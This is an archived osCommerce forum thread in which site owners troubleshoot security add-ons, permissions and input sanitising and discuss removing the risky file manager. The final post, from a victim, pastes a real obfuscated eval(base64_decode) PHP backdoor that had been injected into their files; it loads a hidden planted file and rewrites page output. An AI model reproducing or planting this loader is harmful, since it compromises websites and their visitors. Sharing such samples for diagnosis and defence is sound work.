Jump to content

Archived

This topic is now archived and is closed to further replies.

spooks

How to secure your osCommerce 2.2 site.

Recommended Posts

I presume it is at 644

I've uploaded an empty file, and chmoded it to 777

 

when I press on delete reference file it says this:

 

Reference file creation failed.

But when I look into flash fxp the file sitemonitor_reference.php is deleted.

 

When I press on Execute Sitemonitor it says:

 

Run Sitemonitor. Reference file is not deleted.

Reference file creation failed.

 

When I delete the sitemonitor_reference.php with flash fxp and press Execute Sitemonitor it says:

 

Run Sitemonitor. Reference file is not deleted.

1 mismatches were found. Run the script manually or see the email for the actual mismatches.

 

and This is the mail I received:

root@localhost

NEW FILES:
No new files found...

DELETED FILES:
Found a deleted file named 

SIZE MISMATCH:
Size differences not checked due to deleted file(s)

TIME MISMATCH:
Time differences not checked due to deleted file(s)

PERMISSIONS MISMATCH:
Permissions not checked due to deleted file(s)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sitemonitor ran on July 1, 2009, 1:41 pm
Total mismatches found were 1
Total files being monitored is 1

Share this post


Link to post
Share on other sites

I’ve disabled the reviews buttons in products.php and Colunm_right.php

 

I have also removed the the files product_reviews.php / Product_reviews_info.php / Product_reviews_write.php

 

I’ve replaced reviews.php with a link back to the home page

 

Will this remove any security issues with customer reviews?

Share this post


Link to post
Share on other sites

there are no particular issues with reviews, its the testimonials contrrib that has the issuue,

 

the only thing i would advise with reviews (as with anything that uses the post) is to sanitise the post, I detailed ealier in this thread on how.


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Sorry, I got the two mixed up! Would I be safe in saying its now removed from my site anyway?

 

Or will removing the files cause other problems?

 

Many thanks

Share this post


Link to post
Share on other sites
Sorry, I got the two mixed up! Would I be safe in saying its now removed from my site anyway?

 

Or will removing the files cause other problems?

 

Many thanks

 

 

yes, have u removed all links to those pages too, otherwise u will get 404 errors


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

ADDITIONAL ISSUE

 

Jan has pointed out a problem with ADMIN take a look at his post

 

http://forums.oscommerce.com/index.php?sho...p;#entry1421616


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites
Permissions on folders should be no higher than 755. If your hosting setup demands permissions of 777 on folders then change hosts.

 

I recently switched to a VPS... so I should have control over the server. I'm finding that folders that were fine with 755 before the switch now require 777. Is there a way to config the server differently? I dont have much server side experience.

Share this post


Link to post
Share on other sites

Have you read through http://httpd.apache.org/docs/2.0/


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites
Have you read through http://httpd.apache.org/docs/2.0/

 

Thanks... I've glanced through it a while ago.. I'll have another look. I guess it's more important to me now that I've running on the VPS.

 

 

After installing sitemonitor I'm getting this at the top of the sitemonitor page...

 

 

Warning: opendir(/var/www/vhosts/rhythmhousedrums.com/httpdocs/cgi-bin/tmp/) [function.opendir]: failed to open dir: Permission denied in /var/www/vhosts/rhythmhousedrums.com/httpdocs/admin/includes/functions/sitemonitor_functions.php on line 168

Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/vhosts/rhythmhousedrums.com/httpdocs/admin/includes/functions/sitemonitor_functions.php on line 170

Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/vhosts/rhythmhousedrums.com/httpdocs/admin/includes/functions/sitemonitor_functions.php on line 182

 

any ideas?

Share this post


Link to post
Share on other sites
Thanks... I've glanced through it a while ago.. I'll have another look. I guess it's more important to me now that I've running on the VPS.

 

 

After installing sitemonitor I'm getting this at the top of the sitemonitor page...

 

 

Warning: opendir(/var/www/vhosts/rhythmhousedrums.com/httpdocs/cgi-bin/tmp/) [function.opendir]: failed to open dir: Permission denied in /var/www/vhosts/rhythmhousedrums.com/httpdocs/admin/includes/functions/sitemonitor_functions.php on line 168

Warning: readdir(): supplied argument is not a valid Directory resource in /var/www/vhosts/rhythmhousedrums.com/httpdocs/admin/includes/functions/sitemonitor_functions.php on line 170

Warning: closedir(): supplied argument is not a valid Directory resource in /var/www/vhosts/rhythmhousedrums.com/httpdocs/admin/includes/functions/sitemonitor_functions.php on line 182

 

any ideas?

 

Figured it out! I figured again it was with the weird permissions on my VPS... it was.

Share this post


Link to post
Share on other sites

If you've been hacked then u need to look at getting your host to wipe your site, in case the hackers have left hidden back doors etc.

 

You should restore your site from your local 'clean' copy, that you did remember to tale b4, did'nt you. I remind you that this applies to your files & dBase.

 

Some additional handy tools:

 

 

SiteMonitor Watches files for changes http://addons.oscommerce.com/info/4441

Protection of Configuration http://addons.oscommerce.com/info/2137

 

AutoBackup Database in Admin http://addons.oscommerce.com/info/2314

AND Database backup manager http://addons.oscommerce.com/info/5769


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites
Just a question about these 2:

You can prevent any injection attacks with Security Pro http://addons.oscommerce.com/info/5752

 

You can monitor sites for unauthorised changes with SiteMonitor http://addons.oscommerce.com/info/4441

 

Is the SQL prevention only designed to assist with prevention of bad code in contributions? Is the standard osCommerce SQL injection prevention good enough?

I'm not quite sure how SiteMon helps. If a hacker got into your site, they might change SiteMon anyway? Of course, that would rely on a targeted hack against you, which most hackers don't do, they do mass hacks and replace pages.

Share this post


Link to post
Share on other sites

Security Pro will clean inputs that some contribs fail to do, there are places in the standard osc that it helps too, as I have pointed out b4, it does not clean the $_post, see my code for that ealier.

 

SiteMon helps u find what has been changed easily, but obviously an in depth hack could damage that too.


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites
Security Pro will clean inputs that some contribs fail to do, there are places in the standard osc that it helps too, as I have pointed out b4, it does not clean the $_post, see my code for that ealier.

 

SiteMon helps u find what has been changed easily, but obviously an in depth hack could damage that too.

 

I installed the XSS add on but it's not stripping html tags.

I updated an address from the admin pages and included <a>test</a> in the address and it saved the html tags to the database.

 

http://addons.oscommerce.com/info/6546

Share this post


Link to post
Share on other sites
I installed the XSS add on but it's not stripping html tags.

I updated an address from the admin pages and included <a>test</a> in the address and it saved the html tags to the database.

 

http://addons.oscommerce.com/info/6546

 

I`m not certain the XSS add on does that, instal Security Pro, its always 1st for me.


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites
I`m not certain the XSS add on does that, instal Security Pro, its always 1st for me.

 

Does security pro clean $_POST as well because the read me says not

Share this post


Link to post
Share on other sites
Does security pro clean $_POST as well because the read me says not

 

I installed security pro but it still allowed this to get into the database when updated from the admin screen: testernew<a>test</a>

It should be stripping html tags shouldn't it?

From the normal cart it strips html tags but it doesn't strip off characters such as semi colon, etc. all which could be used for SQL injections. I'm guessing these are $_POST characters all of which a hacker could submit quite easily, no?

Share this post


Link to post
Share on other sites

If you read the doc with security pro u will see how to adjust cleaned chars!!

 

As I stated, see my code to clean the $_post ealier in this thread!!

 

You will also see that security pro does not operate on the admin side, as most don't, they should'nt need to!

 

 

Please start reading the docs etc instead of asking endless aimlless questions! :rolleyes:


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites
If you read the doc with security pro u will see how to adjust cleaned chars!!

 

As I stated, see my code to clean the $_post ealier in this thread!!

 

You will also see that security pro does not operate on the admin side, as most don't, they should'nt need to!

 

 

Please start reading the docs etc instead of asking endless aimlless questions! :rolleyes:

 

They're all aimed questions :)

I've read through the entire post - you don't have a post on the $_POST var in this thread.

I disagree with the admin side part, ALL user input should be cleaned regardless. Sure there are other ways to secure the admin folders but it still leaves it open to a hack...not as vulnerable as the public side though.

Share this post


Link to post
Share on other sites
you don't have a post on the $_POST var in this thread.

I disagree with the admin side part, ALL user input should be cleaned regardless. Sure there are other ways to secure the admin folders but it still leaves it open to a hack...not as vulnerable as the public side though.

 

u should not be using client side applications as the bases for securing your admin!! Use proper methods, htaccess ideally.

 

Securing the "admin" Folder http://forums.oscommerce.com/index.php?sho...hl=admin+folder

 

If u wish to extend the scope of any contib, modify it yourself or talk to the auther.

 

I`m sure there were a number of posts on the $_POST, but can't fnd them myself!! :blush: so here is the code:

 

on any pages accepting $_POST vars after:

 

 require('includes/application_top.php');

add

 

// clean posted vars
reset($_POST);
  while (list($key, $value) = each($_POST)) {
 if (!is_array($_POST[$key])) {
	  $_POST[$key] = preg_replace("/[^ /na-zA-Z0-9@%:{}_.-]/i", "", urldecode($_POST[$key]));
	} else { unset($_POST[$key]); } // no arrays expected 
  }

This does not allow for arrays, additional code is needed if they are used.


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites
u should not be using client side applications as the bases for securing your admin!! Use proper methods, htaccess ideally.

 

Securing the "admin" Folder http://forums.oscommerce.com/index.php?sho...hl=admin+folder

 

If u wish to extend the scope of any contib, modify it yourself or talk to the auther.

 

I`m sure there were a number of posts on the $_POST, but can't fnd them myself!! :blush: so here is the code:

 

on any pages accepting $_POST vars after:

 

 require('includes/application_top.php');

add

 

// clean posted vars
reset($_POST);
  while (list($key, $value) = each($_POST)) {
 if (!is_array($_POST[$key])) {
	  $_POST[$key] = preg_replace("/[^ /na-zA-Z0-9@%:{}_.-]/i", "", urldecode($_POST[$key]));
	} else { unset($_POST[$key]); } // no arrays expected 
  }

This does not allow for arrays, additional code is needed if they are used.

 

Rather than add to every page, I added just to application_top.php as every page includes that.

However, it throws errors not recognising the n part of the preg_replace.

 

//addition to security pro to check the post variables as well

reset($_POST);

while (list($key, $value) = each($_POST)) {

if (!is_array($_POST[$key])) {

$_POST[$key] = preg_replace("/[^ /na-zA-Z0-9@%:{}_.-]/i", "", urldecode($_POST[$key]));

}

else { unset($_POST[$key]); } // no arrays expected

}

 

//

Someone should add this to security pro probably since it misses out an entire section of html forms and the POST variable :)

Share this post


Link to post
Share on other sites

use:

 

$_POST[$key] = preg_replace("/[^ a-zA-Z0-9@%:{}_.-]/i", "", urldecode($_POST[$key]));

 

Security pro is about cleaning the querystring, that why it don't touch the $_POST

 

Someone should add this to security pro probably since it misses out an entire section of html forms and the POST variable

 

Contribs are voluntary, we do not accept orders!! If u want it, do it yourself!!


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites
use:

 

$_POST[$key] = preg_replace("/[^ a-zA-Z0-9@%:{}_.-]/i", "", urldecode($_POST[$key]));

 

Security pro is about cleaning the querystring, that why it don't touch the $_POST

 

 

 

Contribs are voluntary, we do not accept orders!! If u want it, do it yourself!!

 

It wasn't an order, lol :)

Just seemed strange that all security is about cleaning user input therefore any security should look at all input variables. I just may add it to the contrib.

Share this post


Link to post
Share on other sites

FILEMANAGER HACK

 

Just adding this note here so any future visitors are aware.

 

It has long been known the filemanger is a security risk & should, ney MUST be removed, if used for editing your site it is likely to damage your files, so is a bad utility to keep anyway http://www.oscommerce.info/kb/osCommerce/Common_Problems/15 Its also been known its a possible hacking route & to make matters worse there now exists a very nasty hack that uses filemanger to gain access to your site ( dbase included!! )

 

So remove it now, use a normal editor like such as html-kit or notepad++ after downloading all your files to your PC with ftp such as filezilla.

 

To remove:

 

Delete file_manager.php from catalog/admin

 

open admin/includes/boxes/tools.php and delete the line:

 '<a href="' . tep_href_link(FILENAME_FILE_MANAGER) . '" class="menuBoxContentLink">' . BOX_TOOLS_FILE_MANAGER . '</a><br>' .


Sam

 

Remember, What you think I ment may not be what I thought I ment when I said it.

 

Contributions:

 

Auto Backup your Database, Easy way

 

Multi Images with Fancy Pop-ups, Easy way

 

Products in columns with multi buy etc etc

 

Disable any Category or Product, Easy way

 

Secure & Improve your account pages et al.

Share this post


Link to post
Share on other sites

Any idea what this hack is? I just noticed it got me last week, all my php files have it. What works to prevent this one? I know i put the sql injection patch on a while back.

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p
KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZTQvc2hvcGZvdTMvcHVibGljX
2h0bWwvY2F0YWxvZy9hZG1pbi9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4L1
92dGlfY25mL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZTQvc2hvcGZvdTMvcHVibGl
jX2h0bWwvY2F0YWxvZy9hZG1pbi9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL2luZGV4
L192dGlfY25mL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb
25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbi
BnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzM
wODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjcz
Mjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBM
jA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEOD
ZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFI
yMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNG
QzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDR
DFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMz
kzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3Qjd
BN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4
LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENER
ThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RT
QxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0Q
xQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5
N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxM
EVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQU
RDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTV
CNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRE
NzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBN
UI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1ME
FFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzN
FMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMy
RjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2Q
zczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJy
QxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21
sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319
fQ==')); ?>

Share this post


Link to post
Share on other sites

×